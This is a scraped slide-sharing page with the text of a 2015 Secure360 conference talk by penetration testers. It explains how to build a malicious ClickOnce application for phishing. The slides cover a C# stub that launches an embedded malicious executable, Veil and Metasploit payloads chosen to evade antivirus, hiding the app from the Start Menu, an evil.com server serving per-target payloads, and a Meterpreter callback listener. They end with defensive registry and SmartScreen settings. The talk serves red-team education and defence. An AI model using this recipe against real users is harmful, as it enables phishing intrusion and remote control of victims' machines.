Andrew Useckas Csa presentation   hacking custom webapps 4 3Andrew Useckas Csa presentation   hacking custom webapps 4 3
Andrew Useckas Csa presentation hacking custom webapps 4 3
 
AusCERT - Developing Secure iOS Applications
AusCERT - Developing Secure iOS ApplicationsAusCERT - Developing Secure iOS Applications
AusCERT - Developing Secure iOS Applications
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015   sebaSolvay secure application layer v2015   seba
Solvay secure application layer v2015 seba
 

Recently uploaded

Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)
Jakub Marek
 
Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |
AstuteBusiness
 
Dandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity serverDandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity server
Antonios Katsarakis
 
Must Know Postgres Extension for DBA and Developer during Migration
Must Know Postgres Extension for DBA and Developer during MigrationMust Know Postgres Extension for DBA and Developer during Migration
Must Know Postgres Extension for DBA and Developer during Migration
Mydbops
 
Fueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte WebinarFueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte Webinar
Zilliz
 
Nordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptxNordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptx
MichaelKnudsen27
 
The Microsoft 365 Migration Tutorial For Beginner.pptx
The Microsoft 365 Migration Tutorial For Beginner.pptxThe Microsoft 365 Migration Tutorial For Beginner.pptx
The Microsoft 365 Migration Tutorial For Beginner.pptx
operationspcvita
 
"$10 thousand per minute of downtime: architecture, queues, streaming and fin...
"$10 thousand per minute of downtime: architecture, queues, streaming and fin..."$10 thousand per minute of downtime: architecture, queues, streaming and fin...
"$10 thousand per minute of downtime: architecture, queues, streaming and fin...
Fwdays
 
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham HillinQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
LizaNolte
 
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectorsConnector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
DianaGray10
 
Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024
Jason Packer
 
Leveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and StandardsLeveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and Standards
Neo4j
 
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge GraphGraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
Neo4j
 
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
DanBrown980551
 
Christine's Supplier Sourcing Presentaion.pptx
Christine's Supplier Sourcing Presentaion.pptxChristine's Supplier Sourcing Presentaion.pptx
Christine's Supplier Sourcing Presentaion.pptx
christinelarrosa
 
Session 1 - Intro to Robotic Process Automation.pdf
Session 1 - Intro to Robotic Process Automation.pdfSession 1 - Intro to Robotic Process Automation.pdf
Session 1 - Intro to Robotic Process Automation.pdf
UiPathCommunity
 
Northern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving | Modern Metal Trim, Nameplates and Appliance PanelsNorthern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving
 
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
Your One-Stop Shop for Python Success: Top 10 US Python Development ProvidersYour One-Stop Shop for Python Success: Top 10 US Python Development Providers
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
akankshawande
 
Mutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented ChatbotsMutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented Chatbots
Pablo Gómez Abajo
 
Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...
Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...
Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...
Pitangent Analytics & Technology Solutions Pvt. Ltd
 

Recently uploaded (20)

Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)
 
Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |
 
Dandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity serverDandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity server
 
Must Know Postgres Extension for DBA and Developer during Migration
Must Know Postgres Extension for DBA and Developer during MigrationMust Know Postgres Extension for DBA and Developer during Migration
Must Know Postgres Extension for DBA and Developer during Migration
 
Fueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte WebinarFueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte Webinar
 
Nordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptxNordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptx
 
The Microsoft 365 Migration Tutorial For Beginner.pptx
The Microsoft 365 Migration Tutorial For Beginner.pptxThe Microsoft 365 Migration Tutorial For Beginner.pptx
The Microsoft 365 Migration Tutorial For Beginner.pptx
 
"$10 thousand per minute of downtime: architecture, queues, streaming and fin...
"$10 thousand per minute of downtime: architecture, queues, streaming and fin..."$10 thousand per minute of downtime: architecture, queues, streaming and fin...
"$10 thousand per minute of downtime: architecture, queues, streaming and fin...
 
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham HillinQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
 
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectorsConnector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
 
Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024
 
Leveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and StandardsLeveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and Standards
 
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge GraphGraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
 
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
 
Christine's Supplier Sourcing Presentaion.pptx
Christine's Supplier Sourcing Presentaion.pptxChristine's Supplier Sourcing Presentaion.pptx
Christine's Supplier Sourcing Presentaion.pptx
 
Session 1 - Intro to Robotic Process Automation.pdf
Session 1 - Intro to Robotic Process Automation.pdfSession 1 - Intro to Robotic Process Automation.pdf
Session 1 - Intro to Robotic Process Automation.pdf
 
Northern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving | Modern Metal Trim, Nameplates and Appliance PanelsNorthern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
 
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
Your One-Stop Shop for Python Success: Top 10 US Python Development ProvidersYour One-Stop Shop for Python Success: Top 10 US Python Development Providers
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
 
Mutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented ChatbotsMutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented Chatbots
 
Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...
Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...
Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...
 

All You Need is One - A ClickOnce Love Story - Secure360 2015

  • 1. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org All You Need Is One - A ClickOnce Love Story Ryan Gandrud Cody Wass
  • 2. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org Introduction • Ryan Gandrud – Penetration tester – Computer enthusiast • Cody Wass – Web applications – Scotch aficionado
  • 3. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org Overview • ClickOnce? • Phishing-phriendly pheatures • Creating a malicious ClickOnce application • Phishing setup • Issues and pitfalls • Demo • Prevention
  • 4. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org ClickOnce WTF? • ClickOnce – What is it? – ClickOnce is a wrapper that sits around a Windows executable to “install” it on a machine – Used by application administrators to deploy installations to users in the network – Supports multiple deployment methods (web, network share, local execution)
  • 5. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org ClickOnce Internals • ProjectName.application – Contains the location of the manifest and application version information • ProjectName.exe.config.deploy – Contains application settings (i.e. connection strings, etc.) • ProjectName.exe.deploy – The (potentially malicious) executable that will be run by a user • ProjectName.exe.manifest – Manifest file containing application version, .NET versions supported, permission level requested, and signatures for the other files – Contains the file name for the executable
  • 6. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org ClickOnce Certificate Signing • ClickOnce and .NET support signing applications • Authenticode – Microsoft cert-based signing technology used to verify the authenticity of publisher • Need to “acquire” an code-signing Authenticode certificate from a Certificate Authority (CA) • Signing stages available – Signed (CA) – Self-signed (MakeCert.exe in .NET) – Unsigned (No cert used)
  • 7. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org ClickOnce Trust Architecture • Applications and how they are executed are based on a trust architecture separated into different execution source zones • ClickOnce allows permitted applications to elevate privileges automatically (Trusted Sites) or through prompting the user • Prompting levels are controlled by the following registry key – HKEY_LOCAL_MACHINESOFTWAREMICROSOFT.NETFra meworkSecurityTrustManagerPromptingLevel
  • 8. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org ClickOnce Trust Architecture (cont.) • These are features: "But the most important new feature when it comes to security is … the end user can elevate permissions without the help of an administrator“ • “If the application permissions don't exceed policy permissions, the application downloads and runs without asking the user any trust questions.” • “If the application needs more permissions than what's granted by policy, the user is asked if he wants to trust that application and elevate permissions... If the user clicks Run, the application is put into the Application Trust List and is downloaded and started.” MSDN:https://msdn.microsoft.com/en-us/library/aa719097(v=vs.71).aspx
  • 9. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org ClickOnce Trust Architecture (cont.) • When ClickOnce was originally being developed in .NET 2.0 Beta 2, permissions looked promising with the Internet zone being restricted to applications signed by a valid certificate. Zone Applications My Computer Enabled Local Intranet Enabled Trusted Sites Enabled Internet Enabled for signed apps Untrusted Sites Disabled
  • 10. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org ClickOnce Trust Architecture (cont.) • Unfortunately, Microsoft decided to change this, specifically the Internet zone, and not for the best • Now, by default, ClickOnce packages that come from the Internet allow a user to grant the application temporary admin privileges in order to install Zone Applications My Computer Enabled Local Intranet Enabled Trusted Sites Enabled Internet Enabled Untrusted Sites Disabled
  • 11. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org Owning With a Click • Why use ClickOnce application? – ClickOnce is supported on all modern Windows operating systems since it relies on .NET – All distributions come with at least .NET 2.0 since Windows Server 2k3 – .NET supports backwards compatibility – Dead simple to write – Public browser exploits are highly version specific and more often than not, crash the victim’s browser
  • 12. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org Owning With a Click (cont.) • Originally meant to be deployed using Windows Internet Explorer – ClickOnce is supported by IE 6.0+ – Now supported by Firefox and Chrome using third party addons (.NET 3.5+) • Minimizes user interaction • Delivering malicious code through multiple options – It’s a .NET project – write your own – Include malicious executable as a resource
  • 13. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org Payloads • Roll your own payload – Our original vector – Flagged by AV • Standard Metasploit payload – Also attempted – Reverse_HTTPS returned broken shells • Assumed due to AV or something inline during delivery of second Meterpreter stage
  • 14. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org Payloads (cont.) • Powershell – Justin@sixdub did a great write-up on using Powershell commands instead of an executable for a Meterpreter callback with ClickOnce – Pros: • Powershell command runs in memory – never touches disk – Cons: • Difficulty in changing payloads • ClickOnce is already on disk http://www.sixdub.net/?p=555
  • 15. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org Payloads (cont.) • Veil – Pros: • Payloads written in different languages • Encrypted Payloads – less likely to get caught by AV – Cons: • Static “random” Meterpreter callback • This is an issue with how Metasploit handles stagers – Will be fixed (hopefully) soon • We decided to go with Veil since we to avoid AV detection during our Red Team engagement
  • 16. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org Payloads (cont.) • Problem: – Static Meterpreter callbacks from targets • Solution?: – Dynamically generating individualized Veil payloads
  • 17. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org Creating a ClickOnce Application • Visual Studio is used to create ClickOnce applications – The free edition of Visual Studio 2013 supports ClickOnce publishing • Start a new console application project within Visual Studio – No GUI popup during execution
  • 18. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org Creating a ClickOnce Application (cont.) • Using C# in .NET, create a new process that launches your included executable (ClickOnceInc.exe) static class Program { static void Main() { //Starting a new process executing the malicious exe System.Diagnostics.Process p = new System.Diagnostics.Process(); p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardOutput = false; p.StartInfo.FileName = "ClickOnceInc.exe"; p.Start(); } }
  • 19. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org Creating a ClickOnce Application (cont.) • Ensure that your application uses the correct version of .NET so the application runs properly. • Here, .NET 3.5 was chosen by navigating to the Application tab on the left, and selecting the Target Framework from the dropdown.
  • 20. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org Creating a ClickOnce Application (cont.)
  • 21. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org Creating a ClickOnce Application (cont.) • Include your malicious binary into the project by clicking and dragging it over your Solution Explorer
  • 22. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org Creating a ClickOnce Application (cont.) • In the Properties of the application under Publish: – Ensure the Install Mode is set to “available online only” • This prevents the application from showing up in the Start Menu – Clicking the Application Files… button • Exclude the hash for the ClickOnceInc.exe – Dynamic payload generation changes the hash
  • 23. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org Creating a ClickOnce Application (cont.)
  • 24. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org Creating a ClickOnce Application (cont.) • Clicking the Publish button, follow the wizard to publish the ClickOnce application to your local drive • There should be multiple files/directories – Application Files directory – Evil Survey.application – Publish.htm – Setup.exe
  • 25. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org Creating a ClickOnce Application (cont.)
  • 26. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org Server Setup • Web server with ClickOnce-specific directories – Kali with Veil, Metasploit, and Apache • Apache mod_rewrite – GET evil.com?u={ID} -> evil.com/{ID}/evil.application – Combined with dynamic Veil payloads, allowed easy analytics and post-mortem data gathering.
  • 27. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org Callback Listener • Our solution: – Metasploit listener • Phishing scenario – targets are workstations • Most likely have outbound http access • Limited window of engagement • Egress filtering – ssh / icmp / dns tunneling
  • 28. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org Pitfalls • Outdated packages / dependencies – Veil, Python, Wine. • Signing restrictions – No signing allowed with dynamic payloads • No easy way to use mage.exe on linux – Self-signed certs are only marginally better
  • 29. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org Cleanup • ClickOnce install directory: – %LOCALAPPDATA%Apps2.0{machine- specific}{machine-specific}{obfuscated-app- name} • C:UsersBobAppDataLocalApps2.0F3RBL2XD.32Y Z3R2E8LL.92S{app-folder}
  • 30. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org Cleanup • Add/Remove Programs • Delete relevant AppData folder • Nuke everything: – Note: This will clear the entire online application cache. – No need for elevated privileges, AppCaches are user-specific. rundll32 dfshim CleanOnlineAppCache
  • 31. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org Demo • Client: – Windows 7 • Server (evil.com): – Kali running Apache to serve file – Metasploit listener running to catch callback
  • 32. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org Preventative Measures • Typical Anti-Phishing Techniques – User education • Users continue through “… a quarter of Google Chrome’s malware and phishing warnings” – Endpoint protection • Signatures lag behind usage • Heuristics require a practical balance • Limited usefulness for other phishing-based vectors – Least privileged configurations
  • 33. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org Preventative Measures • ClickOnce-Specific Techniques – Code Access Security • ClickOnce applications can specify a “permissions level” • Default: Full Trust – Requires prompt for elevation
  • 34. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org Preventative Measures • Disabling Trust Prompt – HKEY_LOCAL_MACHINESOFTWAREMICROSOFT.NETFra meworkSecurityTrustManagerPromptingLevel – Trust prompt is controlled by zone • Untrusted Sites • Internet • My Computer • Local Intranet • Trusted Sites
  • 35. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org Preventative Measures String Value subkey Value Internet Enabled UntrustedSites Disabled MyComputer Enabled LocalIntranet Enabled TrustedSites Enabled Option Registry setting value Enable the trust prompt. Enabled Restrict the trust prompt. AuthenticodeRequired Disable the trust prompt. Disabled
  • 36. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org Preventative Measures • Windows 8 – SmartScreen Filter • Enabled by default • Adds another layer after user clicks ‘run’ for anything not signed by a recognized CA • Default ‘OK’ action results in application not running
  • 37. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org Flowchart by Robin Shahan (@robindotnet)
  • 38. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org Questions?
  • 39. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org More Information / References • Alice in Warningland: A Large-Scale Field Study of Browser Security Warning Effectiveness – Devdatta Akhawe University of California, Berkeley, devdatta@cs.berkeley.edu – Adrienne Porter Felt Google, Inc, felt@google.com • http://leastprivilege.com/2006/02/18/beware-be-aware-of-clickonce-default-settings/ • https://msdn.microsoft.com/en-us/library/aa719097(v=vs.71).aspx • https://msdn.microsoft.com/en-us/library/cc176048(v=vs.90).aspx • https://msdn.microsoft.com/en-us/library/ee308453.aspx • https://robindotnet.wordpress.com/2013/02/24/windows-8-and-clickonce-the-definitive- answer-2/ • https://blog.netspi.com/bypassing-av-with-veil-evasion/ • https://github.com/rapid7/metasploit-framework/issues/4895 • http://www.sixdub.net/?p=555 • https://blog.netspi.com/